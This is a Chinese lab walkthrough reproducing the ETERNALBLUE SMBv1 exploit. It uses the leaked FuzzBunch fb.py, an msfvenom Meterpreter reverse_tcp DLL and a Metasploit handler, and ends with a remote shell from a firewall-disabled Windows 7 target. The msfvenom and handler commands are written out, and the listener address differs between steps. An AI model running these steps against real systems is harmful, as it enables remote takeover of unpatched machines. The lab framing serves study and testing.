方程式 0day ETERNALBLUE 复现过程

一、漏洞说明

漏洞更新时间为2017/04/17,本文将演示方程式 0day ETERNALBLUE 的利用过程,ETERNALBLUE 通过tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,范围非常广泛。

二、影响的版本

windows7
windows 2008 server
windows 2012

三、系统环境

攻击机1:192.168.11.119
攻击机上面需要安装以下环境:
Windows7 64bit 专业版
python-2.6.6.msi
python下载地址:https://www.python.org/download/releases/2.6.6/
pywin32-221.win32-py2.6.exe
pywin32-221下载地址:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

方程式 0day ETERNALBLUE 复现过程_第1张图片
image.png

攻击机2:192.168.11.114
kali 2017.1,需要用到msf


方程式 0day ETERNALBLUE 复现过程_第2张图片
TIM图片20180207113744.png

靶机:192.168.11.103
win7 64SP1 专业版
关闭系统防火墙


方程式 0day ETERNALBLUE 复现过程_第3张图片
QQ图片20180207114014.jpg

四、攻击环境搭建

漏洞利用脚本
https://github.com/misterch0c/shadowbroker

下载解压 切换到windows目录执行fb.py


方程式 0day ETERNALBLUE 复现过程_第4张图片
image.png

看fb.py发现是遍历目录的时候出错了,发现缺少listeningposts目录 创建一个listeningposts目录

再次运行fb.py创建一个攻击项目,设置如下:
目标主机的IP:192.168.11.103
攻击机地址:192.168.11.119


方程式 0day ETERNALBLUE 复现过程_第5张图片
image.png

方程式 0day ETERNALBLUE 复现过程_第6张图片
image.png

方程式 0day ETERNALBLUE 复现过程_第7张图片
image.png

方程式 0day ETERNALBLUE 复现过程_第8张图片
image.png

方程式 0day ETERNALBLUE 复现过程_第9张图片
image.png

方程式 0day ETERNALBLUE 复现过程_第10张图片
image.png

这里要选择SMB和 对应的目标操作系统位数 下面的话是攻击的4个操作 选择RunDLL

image.png

这里用攻击机2 kali的msfvenom 生成一下dll 这里使用的是reverse_tcp的paylaod 可以根据网络情况采用其他payload

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.114 LPORT=4444 -f dll > s.dll
TIM图片20180207160305.png

把生成的s.dll传到攻击机1上

方程式 0day ETERNALBLUE 复现过程_第11张图片
image.png

开启msfconsole 下面的payload要和上面msfvenom的payload对应起来

msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.11.114
msf > set LPORT 4444
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit
方程式 0day ETERNALBLUE 复现过程_第12张图片
TIM图片20180207160611.png

接着切到攻击机1操作fb.py


方程式 0day ETERNALBLUE 复现过程_第13张图片
TIM图片20180207161707.png

方程式 0day ETERNALBLUE 复现过程_第14张图片
image.png

成功之后坐等shell上线


方程式 0day ETERNALBLUE 复现过程_第15张图片
image.png

这个漏洞对windoes 2008 server版的机器也生效,已经测试过了。

你可能感兴趣的:(方程式 0day ETERNALBLUE 复现过程)